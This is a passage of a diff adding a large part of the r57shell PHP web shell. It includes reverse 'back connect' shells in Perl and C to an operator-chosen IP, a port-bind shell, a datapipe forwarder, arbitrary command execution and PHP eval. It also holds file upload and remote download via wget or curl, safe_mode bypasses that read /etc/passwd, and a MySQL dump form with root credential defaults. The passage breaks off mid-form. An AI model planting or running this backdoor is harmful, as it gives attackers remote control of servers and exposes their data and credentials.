+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* datapipe perl */
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* datapipe C */
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* alias execute */
+if (!empty($_POST['alias']))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload */
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload from remote host */
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $p2=which("wget");
+ if(empty($p2)) $p2="wget";
+ $_POST['cmd'] = $p2." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+
+ case fetch:
+ $p2=which("fetch");
+ if(empty($p2)) $p2="fetch";
+ $_POST['cmd']= $p2." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+
+ case lynx:
+ $p2=which("lynx");
+ if(empty($p2)) $p2="lynx";
+ $_POST['cmd']= $p2." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+
+ case links:
+ $p2=which("links");
+ if(empty($p2)) $p2="links";
+ $_POST['cmd']= $p2." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+
+ case GET:
+ $p2=which("GET");
+ if(empty($p2)) $p2="GET";
+ $_POST['cmd']= $p2." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+
+ case curl:
+ $p2=which("curl");
+ if(empty($p2)) $p2="curl";
+ $_POST['cmd']= $p2." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* command execute */
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=121 rows=15>";
+
+// safe_mode On
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':  // dir listing
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){ // WINDOWS STYLE
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ // UNIX STYLE
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+
+  case 'test2':
+  include($_POST['test2_file']);
+  break;
+
+  case 'test3':
+  $db = @mysql_connect('localhost',$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while($r_sql = @mysql_fetch_array($r)) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+ } // end : switch($_POST['cmd'])
+
+} // end : if($safe_mode)
+
+// safe_mode Off
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump"))
+{
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }
+
+
+}
+
+// íå çàâèñèò îò ñåéôà
+if ($_POST['cmd']=="php_eval")
+ {
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);
+ }
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* mysql äàìï */
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     // èíôà î äàìïå
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= "# homepage: http://rst.void.ru\r\n";
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     // ïîëó÷àåì äàííûå òàáëèöû
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    // ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   } // end if($db)
+  else echo "[-] ERROR! Can't connect to mysql server";
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ } // end if ($_POST['cmd']=="mysql_dump")
+
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+//////// start table
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* command execute form */
+if(!$safe_mode){
+echo "<form name=command method=post>";
+echo $table_up1; echo $lang[$language.'_text2']; echo $table_up2;
+echo $font;
+echo "<b>".ws(1).$lang[$language.'_text3'].$arrow.ws(4)."</b>";
+echo "<input type=text name=cmd size=85>".ws(2)."<br>";
+echo "<b>".ws(1).$lang[$language.'_text4'].$arrow.ws(4)."</b>";
+echo "<input type=text name=dir size=85 value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* safe_mode form */
+if($safe_mode){
+echo "<form name=safe_ls method=post>";
+echo $table_up1; echo $lang[$language.'_text28']; echo $table_up2;
+echo $font;
+// dir
+echo "<b>".ws(1).$lang[$language.'_text4'].$arrow.ws(4)."</b>";
+echo "<input type=text name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=safe_dir>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt6']." \"></form>";
+echo "<form name=safe_cat method=post>";
+echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=file size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=safe_file>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt7']." \"></font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* edit_file form */
+echo "<form name=edit_file method=post>";
+echo $table_up1; echo $lang[$language.'_text42']; echo $table_up2;
+// dir
+echo $font;
+echo "<b>".$lang[$language.'_text43'].$arrow.ws(4)."</b>";
+echo "<input type=text name=e_name size=85 value=";
+echo (!empty($_POST['e_name'])?($_POST['e_name']):($dir));
+echo ">";
+echo "<input type=hidden name=cmd size=85 value=edit_file>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt11']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* mk/del dir/file form */
+if($safe_mode){
+echo "<form name=mk method=post>";
+echo $table_up1; echo $lang[$language.'_text57']; echo $table_up2;
+// dir
+echo $font;
+echo ws(24)."<b>".$lang[$language.'_text58'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mk_name size=54 value=";
+echo (!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"));
+echo ">";
+echo ws(2)."<select name=action>";
+echo "<option value=create>".$lang[$language.'_text65']."</option>";
+echo "<option value=delete>".$lang[$language.'_text66']."</option>";
+echo "</select>";
+echo ws(2)."<select name=what>";
+echo "<option value=file>".$lang[$language.'_text59']."</option>";
+echo "<option value=dir>".$lang[$language.'_text60']."</option>";
+echo "</select>";
+echo "<input type=hidden name=cmd size=85 value=mk>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt13']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* change perm form */
+if($safe_mode && $unix){
+echo "<form name=ch method=post>";
+echo $table_up1; echo $lang[$language.'_text67']; echo $table_up2;
+// dir
+echo $font;
+echo ws(14)."<b>".$lang[$language.'_text69'].$arrow.ws(4)."</b>";
+echo "<input type=text name=param1 size=40 value=";
+echo (($_POST['param1'])?($_POST['param1']):("filename"));
+echo ">";
+echo ws(2)."<b>".$lang[$language.'_text70'].$arrow.ws(4)."</b>";
+echo "<input type=text name=param2 size=26 value=";
+echo (($_POST['param2'])?($_POST['param2']):("0777"));
+echo " title='".$lang[$language.'_text71']."'><br>";
+echo "<input type=hidden name=cmd size=85 value=ch_>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(15)."<b>".$lang[$language.'_text68'].$arrow.ws(4)."</b>";
+echo ws(2)."<select name=what>";
+echo "<option value=mod>CHMOD</option>";
+echo "<option value=own>CHOWN</option>";
+echo "<option value=grp>CHGRP</option>";
+echo "</select>";
+echo ws(87)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* aliases form */
+if(!$safe_mode){
+echo "<form name=aliases method=POST>";
+echo $table_up1; echo $lang[$language.'_text7']; echo $table_up2;
+echo $font;
+echo "<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* search text form */
+echo "<form name=search_text method=post>";
+echo $table_up1; echo $lang[$language.'_text54']; echo $table_up2;
+echo $font;
+echo ws(5)."<b>".$lang[$language.'_text52'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_text size=85 value=\"text\"><br>";
+echo ws(8)."<b>".$lang[$language.'_text53'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_dir size=85 value=".$dir."> * ( /root;/home;/tmp )<br>";
+echo ws(5)."<b>".$lang[$language.'_text55'].$arrow.ws(4)."</b>";
+echo "<input type=checkbox name=m value=1 id=m>";
+echo "<input type=text name=s_mask size=82 value=.txt;.php>  * ( .txt;.php;.htm )";
+echo "<input type=hidden name=cmd size=85 value=search_text>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<br><div align=center><input type=submit name=submit value=\" ".$lang[$language.'_butt12']." \"></div>";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* search text with find form */
+echo "<form name=search_text method=post>";
+echo $table_up1; echo $lang[$language.'_text76']; echo $table_up2;
+echo $font;
+echo ws(5)."<b>".$lang[$language.'_text72'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_text size=85 value=\"text\"><br>";
+echo ws(8)."<b>".$lang[$language.'_text73'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_dir size=85 value=".$dir."> * ( /root;/home;/tmp )<br>";
+echo ws(6)."<b>".$lang[$language.'_text74'].$arrow.ws(4)."</b>";
+echo "<input type=text name=s_mask size=85 value=*.[hc]>".ws(1).$lang[$language.'_text75'];
+echo "<input type=hidden name=cmd size=85 value=find_text>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(1)."<br><div align=center><input type=submit name=submit value=\" ".$lang[$language.'_butt12']." \"></div>";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php eval form */
+echo "<form name=php method=post>";
+echo $table_up1; echo $lang[$language.'_text32']; echo $table_up2;
+echo $font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=php_eval>";
+echo "<br>".ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt1']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php safe_mode break test 1 form */
+if($safe_mode&&$curl_on)
+{
+echo "<form name=test1 method=post>";
+echo $table_up1; echo $lang[$language.'_text33']; echo $table_up2;
+echo $font;
+echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test1_file size=85 value=";
+echo (!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=test1>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php safe_mode break test 2 form */
+if($safe_mode)
+{
+echo "<form name=test2 method=post>";
+echo $table_up1; echo $lang[$language.'_text34']; echo $table_up2;
+echo $font;
+echo "<b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test2_file size=85 value=";
+echo (!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=test2>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* php safe_mode break test 3 form */
+if($safe_mode&&$mysql_on)
+{
+echo "<form name=test3 method=post>";
+echo $table_up1; echo $lang[$language.'_text35']; echo $table_up2;
+echo $font;
+echo "<b>".ws(27).$lang[$language.'_text36'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_md size=15 value=";
+echo (!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"));
+echo ">";
+echo "<b>".ws(13).$lang[$language.'_text37'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_ml size=15 value=";
+echo (!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"));
+echo ">";
+echo "<b>".ws(12).$lang[$language.'_text38'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_mp size=15 value=";
+echo (!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"));
+echo ">";
+echo "<br><b>".ws(9).$lang[$language.'_text30'].$arrow.ws(4)."</b>";
+echo "<input type=text name=test3_file size=85 value=";
+echo (!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=test3>";
+echo ws(1)."<input type=submit name=submit value=\" ".$lang[$language.'_butt8']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload form */
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1; echo $lang[$language.'_text5']; echo $table_up2;
+echo $font;
+echo "<b>".ws(7).$lang[$language.'_text6'].$arrow.ws(4)."</b>";
+echo "<input type=file name=userfile size=85>&nbsp;";
+echo "<br><b>".ws(20).$lang[$language.'_text21'].$arrow.ws(4)."</b>";
+echo "<input type=checkbox name=nf1 value=1 id=nf1><input type=text name=new_name size=82>".ws(1);
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language.'_butt2']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* file upload from remote host form */
+if(!$safe_mode&&!$windows){
+echo "<form name=remote_upload method=POST>";
+echo $table_up1; echo $lang[$language.'_text15']; echo $table_up2;
+echo $font;
+echo "<b>".ws(13).$lang[$language.'_text16'].$arrow.ws(4)."</b>";
+echo "<select size=\"1\" name=\"with\">";
+echo "<option value=\"wget\">wget</option>";
+echo "<option value=\"fetch\">fetch</option>";
+echo "<option value=\"lynx\">lynx</option>";
+echo "<option value=\"links\">links</option>";
+echo "<option value=\"curl\">curl</option>";
+echo "<option value=\"GET\">GET</option>";
+echo "</select>&nbsp;<br>";
+echo "<b>".ws(7).$lang[$language.'_text17'].$arrow.ws(4)."</b>";
+echo "<input type=text name=rem_file value=http:// size=85>".ws(2)."<br>";
+echo "<b>".ws(7).$lang[$language.'_text18'].$arrow.ws(4)."</b>";
+echo "<input type=text name=loc_file size=85 value=".$dir.">".ws(1);
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language.'_butt2']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* mysql dump form */
+if($mysql_on)
+{
+echo "<form name=mysql_dump method=post>";
+echo $table_up1; echo $lang[$language.'_text40']; echo $table_up2;
+echo $font;
+echo "<b>".ws(27).$lang[$language.'_text36'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mysql_db size=15 value=";
+echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
+echo ">";
+echo "<b>".ws(4).$lang[$language.'_text39'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mysql_tbl size=15 value=";
+echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
+echo ">";
+echo "<b>".ws(4).$lang[$language.'_text37'].$arrow.ws(4)."</b>";
+echo "<input type=text name=mysql_l size=15 value=";
+echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
+echo ">";
+echo "<b>".ws(4).$lang[$language.'_text38'].$arrow.ws(1)."</b>";
+echo "<input type=text name=mysql_p size=15 value=";
+echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
+echo "<br><b>".ws(4).$lang[$language.'_text41'].$arrow.ws(1)."</b>";
+echo "<input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
+echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
+echo ">".ws(1);
+echo ws(4)."<input type=submit name=submit value=\" ".$lang[$language.'_butt9']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* port bind form */
+if(!$safe_mode&&!$windows){
+echo "<form name=bind method=POST>";
+echo $table_up1; echo $lang[$language.'_text9']; echo $table_up2;
+echo $font;
+echo "<b>".ws(14).$lang[$language.'_text10'].$arrow.ws(4)."</b>";
+echo "<input type=text name=port size=15 value=11457>".ws(1);
+echo "<b>".ws(6).$lang[$language.'_text11'].$arrow.ws(4)."</b>";
+echo "<input type=text name=bind_pass size=15 value=r57>".ws(1);
+echo "<b>".ws(6).$lang[$language.'_text20'].$arrow.ws(1)."</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(6)."<input type=submit name=submit value=\" ".$lang[$language.'_butt3']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* back connect form */
+if(!$safe_mode&&!$windows){
+echo "<form name=back method=POST>";
+echo $table_up1; echo $lang[$language.'_text12']; echo $table_up2;
+echo $font;
+echo "<b>".ws(22).$lang[$language.'_text13'].$arrow.ws(4)."</b>";
+echo "<input type=text name=ip size=15 value=";
+echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"));
+echo ">".ws(1);
+echo "<b>".ws(37).$lang[$language.'_text14'].$arrow.ws(4)."</b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>".ws(6).$lang[$language.'_text20'].$arrow.ws(1)."</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo ws(6)."<input type=submit name=submit value=\" ".$lang[$language.'_butt4']." \">";
+echo "</font>";
+echo $table_end1;
+echo "</form>";
+}
+//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
+/* datapipe */
+if(!$safe_mode&&!$windows){
